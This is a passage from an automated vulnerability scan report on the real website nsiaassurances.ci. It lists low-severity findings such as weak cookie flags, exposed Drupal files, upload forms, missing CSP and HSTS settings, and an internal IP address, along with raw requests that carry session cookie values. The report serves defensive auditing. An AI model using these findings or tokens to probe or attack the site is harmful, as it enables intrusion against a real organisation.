- Cookie without SameSite attribute.

When cookies lack the SameSite attribute, Web browsers may apply different and sometim

https://nsiaassurances.ci/index.php/pt/node/18

Cookie was set with:

Set-Cookie: SESS3fca59cf4d21053ced78977fbe56ca82=UZeYwX3H1UenHeYBwOiU7ntGOmByRNCipOKD

This cookie has the following issues:

- Cookie without SameSite attribute.

When cookies lack the SameSite attribute, Web browsers may apply different and sometim

197
https://nsiaassurances.ci/themes/custom/nsiasubtheme/css/img/slider/

Cookie was set with:

Set-Cookie: SESS3fca59cf4d21053ced78977fbe56ca82=UZeYwX3H1UenHeYBwOiU7ntGOmByRNCipOKD

This cookie has the following issues:

- Cookie without SameSite attribute.

When cookies lack the SameSite attribute, Web browsers may apply different and sometim

https://nsiaassurances.ci/index.php/fr/node/28

Cookie was set with:

Set-Cookie: SESS3fca59cf4d21053ced78977fbe56ca82=UZeYwX3H1UenHeYBwOiU7ntGOmByRNCipOKD

This cookie has the following issues:

- Cookie without SameSite attribute.

When cookies lack the SameSite attribute, Web browsers may apply different and sometim

https://nsiaassurances.ci/index.php/en/system/404

Cookie was set with:

Set-Cookie: SESS3fca59cf4d21053ced78977fbe56ca82=UZeYwX3H1UenHeYBwOiU7ntGOmByRNCipOKD

This cookie has the following issues:

- Cookie without SameSite attribute.

When cookies lack the SameSite attribute, Web browsers may apply different and sometim

https://nsiaassurances.ci/fr/node/30

Cookie was set with:

Set-Cookie: SESS3fca59cf4d21053ced78977fbe56ca82=UZeYwX3H1UenHeYBwOiU7ntGOmByRNCipOKD

This cookie has the following issues:

- Cookie without SameSite attribute.

When cookies lack the SameSite attribute, Web browsers may apply different and sometim

https://nsiaassurances.ci/index.php/fr/node/28

Cookie was set with:

Set-Cookie: SESS3fca59cf4d21053ced78977fbe56ca82=UZeYwX3H1UenHeYBwOiU7ntGOmByRNCipOKD

This cookie has the following issues:

- Cookie without SameSite attribute.

When cookies lack the SameSite attribute, Web browsers may apply different and sometim

198
https://nsiaassurances.ci/pt/node/20

Cookie was set with:

Set-Cookie: SESS3fca59cf4d21053ced78977fbe56ca82=UZeYwX3H1UenHeYBwOiU7ntGOmByRNCipOKD

This cookie has the following issues:

- Cookie without SameSite attribute.

When cookies lack the SameSite attribute, Web browsers may apply different and sometim

Request headers
GET /index.php/en/node/28?name=zFPWdwPk&optionDriver=1&subject=Souscription HTTP/1.1

Referer: https://nsiaassurances.ci/

Cookie: SESS3fca59cf4d21053ced78977fbe56ca82=UZeYwX3H1UenHeYBwOiU7ntGOmByRNCipOKD4RubqPc

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Encoding: gzip,deflate,br

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like


Gecko) Chrome/106.0.0.0 Safari/537.36

Host: nsiaassurances.ci

Connection: Keep-alive


Cookies without HttpOnly flag set

Severity Low
Reported by module /RPA/Cookie_Without_HttpOnly.js

Description

One or more cookies don't have the HttpOnly flag set. When a cookie is set with the HttpOnly flag, it instructs the browser
that the cookie can only be accessed by the server and not by client-side scripts. This is an important security protection for
session cookies.

Impact

Cookies can be accessed by client-side scripts.

Recommendation

If possible, you should set the HttpOnly flag for these cookies.

Affected items

Web Server
Verified vulnerability

199
Details
Cookies without HttpOnly flag set:

https://nsiaassurances.ci/fr/big_pipe/no-js

Set-Cookie: big_pipe_nojs=1; path=/

Request headers
GET /fr/big_pipe/no-js?destination=/fr/cookies/documentation HTTP/1.1

Referer: https://nsiaassurances.ci/cookies/documentation

Cookie: SESS3fca59cf4d21053ced78977fbe56ca82=UZeYwX3H1UenHeYBwOiU7ntGOmByRNCipOKD4RubqPc;
cookiesjsr=%7B%22base%22%3Afalse%2C%22analytics%22%3Afalse%2C%22facebook_pixel%22%3Afalse
%2C%22video%22%3Afalse%7D

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Encoding: gzip,deflate,br

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like


Gecko) Chrome/106.0.0.0 Safari/537.36

Host: nsiaassurances.ci

Connection: Keep-alive


Cookies without Secure flag set

Severity Low
Reported by module /RPA/Cookie_Without_Secure.js

Description

One or more cookies does not have the Secure flag set. When a cookie is set with the Secure flag, it instructs the browser
that the cookie can only be accessed over secure SSL/TLS channels. This is an important security protection for session
cookies.

Impact

Cookies could be sent over unencrypted channels.

Recommendation

If possible, you should set the Secure flag for these cookies.

Affected items

Web Server
Verified vulnerability

200
Details
Cookies without Secure flag set:

https://nsiaassurances.ci/index.php/en/node/28

Set-Cookie: SESS3fca59cf4d21053ced78977fbe56ca82=UZeYwX3H1UenHeYBwOiU7ntGOmByRNCipOKD

https://nsiaassurances.ci/en/node/28

Set-Cookie: SESS3fca59cf4d21053ced78977fbe56ca82=Xj88ZLgeBOYP_oTu9DnDoaYkvbBjRMmUdl4Rb

https://nsiaassurances.ci/index.php/pt/node/13

Set-Cookie: SESS3fca59cf4d21053ced78977fbe56ca82=UZeYwX3H1UenHeYBwOiU7ntGOmByRNCipOKD

https://nsiaassurances.ci/en/node/19

Set-Cookie: SESS3fca59cf4d21053ced78977fbe56ca82=Xj88ZLgeBOYP_oTu9DnDoaYkvbBjRMmUdl4Rb

https://nsiaassurances.ci/fr/node/28

Set-Cookie: SESS3fca59cf4d21053ced78977fbe56ca82=udfgppTk4ECG7dBmdQ_i1DUjIsxh6hxxP9Bg

https://nsiaassurances.ci/index.php/en/node/28

Set-Cookie: SESS3fca59cf4d21053ced78977fbe56ca82=udfgppTk4ECG7dBmdQ_i1DUjIsxh6hxxP9Bg

https://nsiaassurances.ci/cookies/documentation

Set-Cookie: SESS3fca59cf4d21053ced78977fbe56ca82=udfgppTk4ECG7dBmdQ_i1DUjIsxh6hxxP9Bg

https://nsiaassurances.ci/index.php/pt/node/28

Set-Cookie: SESS3fca59cf4d21053ced78977fbe56ca82=udfgppTk4ECG7dBmdQ_i1DUjIsxh6hxxP9Bg

https://nsiaassurances.ci/index.php/en/node/30

Set-Cookie: SESS3fca59cf4d21053ced78977fbe56ca82=udfgppTk4ECG7dBmdQ_i1DUjIsxh6hxxP9Bg

https://nsiaassurances.ci/fr/user/login

Set-Cookie: SESS3fca59cf4d21053ced78977fbe56ca82=udfgppTk4ECG7dBmdQ_i1DUjIsxh6hxxP9Bg

201
https://nsiaassurances.ci/pt/user/register

Set-Cookie: SESS3fca59cf4d21053ced78977fbe56ca82=udfgppTk4ECG7dBmdQ_i1DUjIsxh6hxxP9Bg

https://nsiaassurances.ci/index.php/pt/node/28

Set-Cookie: SESS3fca59cf4d21053ced78977fbe56ca82=udfgppTk4ECG7dBmdQ_i1DUjIsxh6hxxP9Bg

https://nsiaassurances.ci/fr/node/13

Set-Cookie: SESS3fca59cf4d21053ced78977fbe56ca82=udfgppTk4ECG7dBmdQ_i1DUjIsxh6hxxP9Bg

https://nsiaassurances.ci/index.php/user/register/

Set-Cookie: SESS3fca59cf4d21053ced78977fbe56ca82=UZeYwX3H1UenHeYBwOiU7ntGOmByRNCipOKD

https://nsiaassurances.ci/index.php/pt/node/18

Set-Cookie: SESS3fca59cf4d21053ced78977fbe56ca82=UZeYwX3H1UenHeYBwOiU7ntGOmByRNCipOKD

https://nsiaassurances.ci/themes/custom/nsiasubtheme/css/img/slider/

Set-Cookie: SESS3fca59cf4d21053ced78977fbe56ca82=UZeYwX3H1UenHeYBwOiU7ntGOmByRNCipOKD

https://nsiaassurances.ci/index.php/fr/node/28

Set-Cookie: SESS3fca59cf4d21053ced78977fbe56ca82=UZeYwX3H1UenHeYBwOiU7ntGOmByRNCipOKD

https://nsiaassurances.ci/index.php/en/system/404

Set-Cookie: SESS3fca59cf4d21053ced78977fbe56ca82=UZeYwX3H1UenHeYBwOiU7ntGOmByRNCipOKD

https://nsiaassurances.ci/fr/node/30

Set-Cookie: SESS3fca59cf4d21053ced78977fbe56ca82=UZeYwX3H1UenHeYBwOiU7ntGOmByRNCipOKD

https://nsiaassurances.ci/index.php/fr/node/28

Set-Cookie: SESS3fca59cf4d21053ced78977fbe56ca82=UZeYwX3H1UenHeYBwOiU7ntGOmByRNCipOKD

https://nsiaassurances.ci/pt/node/20

Set-Cookie: SESS3fca59cf4d21053ced78977fbe56ca82=UZeYwX3H1UenHeYBwOiU7ntGOmByRNCipOKD

202
Request headers
GET /index.php/en/node/28?name=zFPWdwPk&optionDriver=1&subject=Souscription HTTP/1.1

Referer: https://nsiaassurances.ci/

Cookie: SESS3fca59cf4d21053ced78977fbe56ca82=UZeYwX3H1UenHeYBwOiU7ntGOmByRNCipOKD4RubqPc

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Encoding: gzip,deflate,br

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like


Gecko) Chrome/106.0.0.0 Safari/537.36

Host: nsiaassurances.ci

Connection: Keep-alive


Documentation files

Severity Low
Reported by module /Scripts/PerFolder/Readme_Files.script

Description

One or more documentation files (e.g. readme.txt, changelog.txt, ...) were found. The information contained in these files
could help an attacker identify the web application you are using and sometimes the version of the application. It's
recommended to remove these files from production systems.

Impact

These files may disclose sensitive information. This information can be used to launch further attacks.

Recommendation

Remove or restrict access to all documentation file acessible from internet.

Affected items

Web Server
Details

203
Documentation files:

https://nsiaassurances.ci/README.txt

File contents (first 100 characters):

CONTENTS OF THIS FILE

---------------------

* About Drupal

* Configuration and features

* Insta ...

https://nsiaassurances.ci/INSTALL.txt

File contents (first 100 characters):

Please read core/INSTALL.txt for detailed installation instructions for your

Drupal web site.

...

Request headers
GET /README.txt HTTP/1.1

Cookie: SESS3fca59cf4d21053ced78977fbe56ca82=UZeYwX3H1UenHeYBwOiU7ntGOmByRNCipOKD4RubqPc

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Encoding: gzip,deflate,br

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like


Gecko) Chrome/106.0.0.0 Safari/537.36

Host: nsiaassurances.ci

Connection: Keep-alive


Insecure Inline Frame (iframe)

Severity Low
Reported by module /httpdata/iframe_sandbox.js

Description

The web page was found to be using an Inline Frame ("iframe") to embed a resource, such as a different web page. The
Inline Frame is either configured insecurely, or not as securely as expected. This vulnerability alert is based on the origin of
the embedded resource and the iframe's sandbox attribute, which can be used to apply security restrictions as well as
exceptions to these restrictions.

Impact

When a web page uses an insecurely configured iframe to embed another web page, the latter may manipulate the former,
and trick its visitors into performing unwanted actions.

Recommendation

Review the iframe's purpose and environment, and use the sandbox attribute to secure the iframe while applying sandbox
directives to ease security restrictions if necessary.

204
References

MDN | iframe: The Inline Frame Element (https://developer.mozilla.org/en-US/docs/Web/HTML/Element/iframe)

HTML Standard: iframe (https://html.spec.whatwg.org/multipage/iframe-embed-object.html#the-iframe-element)

HTML 5.2: 4.7. Embedded content (https://www.w3.org/TR/html52/semantics-embedded-content.html#element-attrdef-


iframe-sandbox)

Affected items

/index.php/pt/node/13
Verified vulnerability
Details
An iframe tag references an external resource, and no sandbox attribute is set.
Request headers
GET /index.php/pt/node/13 HTTP/1.1

Referer: https://nsiaassurances.ci/

Cookie: SESS3fca59cf4d21053ced78977fbe56ca82=UZeYwX3H1UenHeYBwOiU7ntGOmByRNCipOKD4RubqPc;
cookiesjsr=%7B%22base%22%3Afalse%2C%22analytics%22%3Afalse%2C%22facebook_pixel%22%3Afalse
%2C%22video%22%3Afalse%7D

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Encoding: gzip,deflate,br

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like


Gecko) Chrome/106.0.0.0 Safari/537.36

Host: nsiaassurances.ci

Connection: Keep-alive


Content Security Policy (CSP) not implemented

Severity Informational
Reported by module /httpdata/CSP_not_implemented.js

Description

Content Security Policy (CSP) is an added layer of security that helps to detect and mitigate certain types of attacks,
including Cross Site Scripting (XSS) and data injection attacks.

Content Security Policy (CSP) can be implemented by adding a Content-Security-Policy header. The value of this header
is a string containing the policy directives describing your Content Security Policy. To implement CSP, you should define
lists of allowed origins for the all of the types of resources that your site utilizes. For example, if you have a simple site that
needs to load scripts, stylesheets, and images hosted locally, as well as from the jQuery library from their CDN, the CSP
header could look like the following:

205
Content-Security-Policy:

default-src 'self';

script-src 'self' https://code.jquery.com;

It was detected that your web application doesn't implement Content Security Policy (CSP) as the CSP header is missing
from the response. It's recommended to implement Content Security Policy (CSP) into your web application.

Impact

CSP can be used to prevent and/or mitigate attacks that involve content/code injection, such as cross-site scripting/XSS
attacks, attacks that require embedding a malicious resource, attacks that involve malicious use of iframes, such as
clickjacking attacks, and others.

Recommendation

It's recommended to implement Content Security Policy (CSP) into your web application. Configuring Content Security
Policy involves adding the Content-Security-Policy HTTP header to a web page and giving it values to control resources
the user agent is allowed to load for that page.

References

Content Security Policy (CSP) (https://developer.mozilla.org/en-US/docs/Web/HTTP/CSP)

Implementing Content Security Policy (https://hacks.mozilla.org/2016/02/implementing-content-security-policy/)

Affected items

Web Server
Details

206
Paths without CSP header:

https://nsiaassurances.ci/en/node/28

https://nsiaassurances.ci/index.php/en/node/28

https://nsiaassurances.ci/fr/node/28

https://nsiaassurances.ci/index.php/pt/node/13

https://nsiaassurances.ci/en/node/19

https://nsiaassurances.ci/cookies/documentation

https://nsiaassurances.ci/index.php/pt/node/28

https://nsiaassurances.ci/index.php/en/node/30

https://nsiaassurances.ci/fr/user/login

https://nsiaassurances.ci/pt/user/register

https://nsiaassurances.ci/fr/node/13

https://nsiaassurances.ci/index.php/user/register/

https://nsiaassurances.ci/index.php/fr/node/28

https://nsiaassurances.ci/index.php/pt/node/18

https://nsiaassurances.ci/themes/custom/nsiasubtheme/css/img/slider/

https://nsiaassurances.ci/index.php/en/system/404

https://nsiaassurances.ci/fr/node/30

https://nsiaassurances.ci/pt/node/20

https://nsiaassurances.ci/img/logo/

https://nsiaassurances.ci/index.php/pt/node/19

https://nsiaassurances.ci/node/16

Request headers

207
GET /en/node/28?name=zFPWdwPk&optionDriver=1&subject=Souscription HTTP/1.1

Referer: https://nsiaassurances.ci/

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Encoding: gzip,deflate,br

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like


Gecko) Chrome/106.0.0.0 Safari/537.36

Host: nsiaassurances.ci

Connection: Keep-alive


Email addresses

Severity Informational
Reported by module /target/404_text_search.js

Description

One or more email addresses have been found on this website. The majority of spam comes from email addresses
harvested off the internet. The spam-bots (also known as email harvesters and email extractors) are programs that scour
the internet looking for email addresses on any website they come across. Spambot programs look for strings like
[email protected] and then record any addresses found.

Impact

Email addresses posted on Web sites may attract spam.

Recommendation

Check references for details on how to solve this problem.

References

Anti-spam techniques (https://en.wikipedia.org/wiki/Anti-spam_techniques)

Affected items

Web Server
Details
Emails found:

https://nsiaassurances.ci/

[email protected]
https://nsiaassurances.ci/

[email protected]
https://nsiaassurances.ci/

[email protected]
https://nsiaassurances.ci/

[email protected]

208
Request headers
GET / HTTP/1.1

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Encoding: gzip,deflate,br

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like


Gecko) Chrome/106.0.0.0 Safari/537.36

Host: nsiaassurances.ci

Connection: Keep-alive


File uploads

Severity Informational
Reported by module /Crawler/12-Crawler_File_Upload.js

Description

These pages allows visitors to upload files to the server. Various web applications allow users to upload files (such as
pictures, images, sounds, ...). Uploaded files may pose a significant risk if not handled correctly. A remote attacker could
send a multipart/form-data POST request with a specially-crafted filename or mime type and execute arbitrary code.

Impact

If the uploaded files are not safely checked an attacker may upload malicious files.

Recommendation

Restrict file types accepted for upload: check the file extension and only allow certain files to be uploaded. Use a whitelist
approach instead of a blacklist. Check for double extensions such as .php.png. Check for files without a filename like
.htaccess (on ASP.NET, check for configuration files like web.config). Change the permissions on the upload folder so the
files within it are not executable. If possible, rename the files that are uploaded.

Affected items

Web Server
Details

209
Pages with file upload forms:

https://nsiaassurances.ci/index.php/en/user/register

Form name: <empty>

Form action: /index.php/en/user/register

Form method: POST

Form file input: files[user_picture_0] [file]

https://nsiaassurances.ci/pt/user/register

Form name: <empty>

Form action: /pt/user/register

Form method: POST

Form file input: files[user_picture_0] [file]

https://nsiaassurances.ci/index.php/user/register/

Form name: <empty>

Form action: /index.php/user/register/

Form method: POST

Form file input: files[user_picture_0] [file]

https://nsiaassurances.ci/index.php/pt/user/register

Form name: <empty>

Form action: /index.php/pt/user/register

Form method: POST

Form file input: files[user_picture_0] [file]

https://nsiaassurances.ci/index.php/fr/user/register

Form name: <empty>

Form action: /index.php/fr/user/register

Form method: POST

Form file input: files[user_picture_0] [file]

https://nsiaassurances.ci/en/user/register

Form name: <empty>

Form action: /en/user/register

Form method: POST

Form file input: files[user_picture_0] [file]

https://nsiaassurances.ci/fr/user/register

Form name: <empty>

Form action: /fr/user/register

Form method: POST

Form file input: files[user_picture_0] [file]

Request headers
POST /index.php/en/user/register HTTP/1.1

Content-Type: multipart/form-data; boundary=----------YWJkMTQzNDcw

Referer: https://nsiaassurances.ci/

Cookie: SESS3fca59cf4d21053ced78977fbe56ca82=udfgppTk4ECG7dBmdQ_i1DUjIsxh6hxxP9BgGjanVeQ;
cookiesjsr=%7B%22base%22%3Afalse%2C%22analytics%22%3Afalse%2C%22facebook_pixel%22%3Afalse
%2C%22video%22%3Afalse%7D

Content-Length: 979

210
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Encoding: gzip,deflate,br

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like


Gecko) Chrome/106.0.0.0 Safari/537.36

Host: nsiaassurances.ci

Connection: Keep-alive

------------YWJkMTQzNDcw

Content-Disposition: form-data; name="contact"

------------YWJkMTQzNDcw

Content-Disposition: form-data; name="files[user_picture_0]"; filename="file.txt"

Content-Type: text/plain

------------YWJkMTQzNDcw

Content-Disposition: form-data; name="form_build_id"

form-09Ykk-NbrC5XZbGRWYCbAhkPxoQ4XvzgjQeV_QVTABE

------------YWJkMTQzNDcw

Content-Disposition: form-data; name="form_id"

user_register_form

------------YWJkMTQzNDcw

Content-Disposition: form-data; name="mail"

[email protected]

------------YWJkMTQzNDcw

Content-Disposition: form-data; name="name"

211
zFPWdwPk

------------YWJkMTQzNDcw

Content-Disposition: form-data; name="user_picture[0][display]"

------------YWJkMTQzNDcw

Content-Disposition: form-data; name="user_picture[0][fids]"

zFPWdwPk

------------YWJkMTQzNDcw

Content-Disposition: form-data; name="user_picture_0_upload_button"

user_picture_0_upload_button=Upload

------------YWJkMTQzNDcw--


HTTP Strict Transport Security (HSTS) not following best practices

Severity Informational
Reported by module /httpdata/HSTS_not_implemented.js

Description

HTTP Strict Transport Security (HSTS) instructs a web browser to only connect to a web site using HTTPS.
It was detected
that your web application's HTTP Strict Transport Security (HSTS) implementation is not as strict as is typically advisable.

Impact

HSTS can be used to prevent and/or mitigate some types of man-in-the-middle (MitM) attacks

Recommendation

It is recommended to implement best practices of HTTP Strict Transport Security (HSTS) in your web application. Consult
web references for more information.

References

hstspreload.org (https://hstspreload.org/)

MDN: Strict-Transport-Security (https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Strict-Transport-Security)

Affected items

Web Server
Details

212
URLs where HSTS configuration is not according to best practices:

https://nsiaassurances.ci/en/node/28 - No includeSubDomains directive


https://nsiaassurances.ci/index.php/en/node/28 - No includeSubDomains directive
https://nsiaassurances.ci/fr/node/28 - No includeSubDomains directive
https://nsiaassurances.ci/index.php/pt/node/13 - No includeSubDomains directive
https://nsiaassurances.ci/en/node/19 - No includeSubDomains directive
https://nsiaassurances.ci/index.php/en/user/register - No includeSubDomains directive
https://nsiaassurances.ci/pt/user/register - No includeSubDomains directive
https://nsiaassurances.ci/cookies/documentation - No includeSubDomains directive
https://nsiaassurances.ci/index.php/pt/node/28 - No includeSubDomains directive
https://nsiaassurances.ci/index.php/en/node/30 - No includeSubDomains directive
https://nsiaassurances.ci/index.php/user/login/ - No includeSubDomains directive
https://nsiaassurances.ci/fr/user/login - No includeSubDomains directive
https://nsiaassurances.ci/fr/node/13 - No includeSubDomains directive
https://nsiaassurances.ci/index.php/user/register/ - No includeSubDomains directive
https://nsiaassurances.ci/index.php/fr/node/28 - No includeSubDomains directive
https://nsiaassurances.ci/index.php/pt/node/18 - No includeSubDomains directive
https://nsiaassurances.ci/themes/custom/nsiasubtheme/css/img/slider/ - No includeSubDomains directive
https://nsiaassurances.ci/index.php/en/system/404 - No includeSubDomains directive
https://nsiaassurances.ci/fr/node/30 - No includeSubDomains directive
https://nsiaassurances.ci/pt/node/20 - No includeSubDomains directive
https://nsiaassurances.ci/img/logo/ - No includeSubDomains directive

Request headers
GET /en/node/28?name=zFPWdwPk&optionDriver=1&subject=Souscription HTTP/1.1

Referer: https://nsiaassurances.ci/

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Encoding: gzip,deflate,br

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like


Gecko) Chrome/106.0.0.0 Safari/537.36

Host: nsiaassurances.ci

Connection: Keep-alive


Internal IP address disclosure

Severity Informational
Reported by module /httpdata/text_search.js

Description

One or more strings matching an internal IPv4 address were found. These IPv4 addresses may disclose information about
the IP addressing scheme of the internal network. This information can be used to conduct further attacks.

The significance of this finding should be confirmed manually.

Impact

213
Possible sensitive information disclosure.

Recommendation

Prevent this information from being displayed to the user.

Affected items

Web Server
Details
Pages with internal IPs:

https://nsiaassurances.ci/index.php/en/node/28

172.16.192.72
https://nsiaassurances.ci/en/node/28

172.16.192.72
https://nsiaassurances.ci/fr/node/28

172.16.192.72
https://nsiaassurances.ci/index.php/pt/node/28

172.16.192.72
https://nsiaassurances.ci/index.php/fr/node/28

172.16.192.72
https://nsiaassurances.ci/pt/node/28

172.16.192.72
https://nsiaassurances.ci/node/28

172.16.192.72

Request headers
GET /index.php/en/node/28?name=zFPWdwPk&optionDriver=1&subject=Souscription HTTP/1.1

Referer: https://nsiaassurances.ci/

Cookie: SESS3fca59cf4d21053ced78977fbe56ca82=UZeYwX3H1UenHeYBwOiU7ntGOmByRNCipOKD4RubqPc

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Encoding: gzip,deflate,br

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like


Gecko) Chrome/106.0.0.0 Safari/537.36

Host: nsiaassurances.ci

Connection: Keep-alive


Javascript Source map detected

Severity Informational
Reported by module /httpdata/sourcemap_detection.js

Description

214
Client side Javascript source code can be combined, minified or compiled. A source map is a file that maps from the
transformed source to the original source. Source map may help an attacker to read and debug Javascript.

Impact

Access to source maps may help an attacker to read and debug Javascript code. It simplifies finding client-side
vulnerabilities

Recommendation

According to the best practices, source maps should not be accesible for an attacker. Consult web references for more
information

References

Using sourcemaps on production without exposing the source code (https://itnext.io/using-sourcemaps-on-production-


without-revealing-the-source-code-%EF%B8%8F-d41e78e20c89)

SPA source code recovery by un-Webpacking source maps (https://medium.com/@rarecoil/spa-source-code-recovery-by-


un-webpacking-source-maps-ef830fc2351d)

Affected items

Web Server
Details
URLs where links to SourceMaps were found:

sourceMappingURL in JS body - https://nsiaassurances.ci/core/assets/vendor/jquery-form/jquery.form.min.js

Request headers
GET /core/assets/vendor/jquery-form/jquery.form.min.js HTTP/1.1

Referer: https://nsiaassurances.ci/

Cookie: SESS3fca59cf4d21053ced78977fbe56ca82=UZeYwX3H1UenHeYBwOiU7ntGOmByRNCipOKD4RubqPc;
cookiesjsr=%7B%22base%22%3Afalse%2C%22analytics%22%3Afalse%2C%22facebook_pixel%22%3Afalse
%2C%22video%22%3Afalse%7D; big_pipe_nojs=1

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Encoding: gzip,deflate,br

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like


Gecko) Chrome/106.0.0.0 Safari/537.36

Host: nsiaassurances.ci

Connection: Keep-alive


Outdated JavaScript libraries

Severity Informational
Reported by module /deepscan/javascript_library_audit_deepscan.js

215
Description

You are using an outdated version of one or more JavaScript libraries. A more recent version is available. Although your
version was not found to be affected by any security vulnerabilities, it is recommended to keep libraries up to date.

Impact

Consult References for more information.

Recommendation

Upgrade to the latest version.

Affected items

Web Server
Details

jQuery 3.5.1
URL: https://nsiaassurances.ci/en/node/28
Detection method: The library's name and version were determined based on its dynamic behavior.
References:
https://code.jquery.com/

Request headers
GET /en/node/28?name=zFPWdwPk&optionDriver=1&subject=Souscription HTTP/1.1

Referer: https://nsiaassurances.ci/

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Encoding: gzip,deflate,br

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like


Gecko) Chrome/106.0.0.0 Safari/537.36

Host: nsiaassurances.ci

Connection: Keep-alive

Web Server
Details

Modernizr 3.3.1
URL: https://nsiaassurances.ci/index.php/en/user/register
Detection method: The library's name and version were determined based on its dynamic behavior.
References:
https://github.com/Modernizr/Modernizr/releases

Request headers
POST /index.php/en/user/register HTTP/1.1

Content-Type: multipart/form-data; boundary=----------YWJkMTQzNDcw

Referer: https://nsiaassurances.ci/

216
Cookie: SESS3fca59cf4d21053ced78977fbe56ca82=udfgppTk4ECG7dBmdQ_i1DUjIsxh6hxxP9BgGjanVeQ;
cookiesjsr=%7B%22base%22%3Afalse%2C%22analytics%22%3Afalse%2C%22facebook_pixel%22%3Afalse
%2C%22video%22%3Afalse%7D

Content-Length: 979

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Encoding: gzip,deflate,br

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like


Gecko) Chrome/106.0.0.0 Safari/537.36

Host: nsiaassurances.ci

Connection: Keep-alive

------------YWJkMTQzNDcw

Content-Disposition: form-data; name="contact"

------------YWJkMTQzNDcw

Content-Disposition: form-data; name="files[user_picture_0]"; filename="file.txt"

Content-Type: text/plain

------------YWJkMTQzNDcw

Content-Disposition: form-data; name="form_build_id"

form-09Ykk-NbrC5XZbGRWYCbAhkPxoQ4XvzgjQeV_QVTABE

------------YWJkMTQzNDcw

Content-Disposition: form-data; name="form_id"

user_register_form

------------YWJkMTQzNDcw

Content-Disposition: form-data; name="mail"

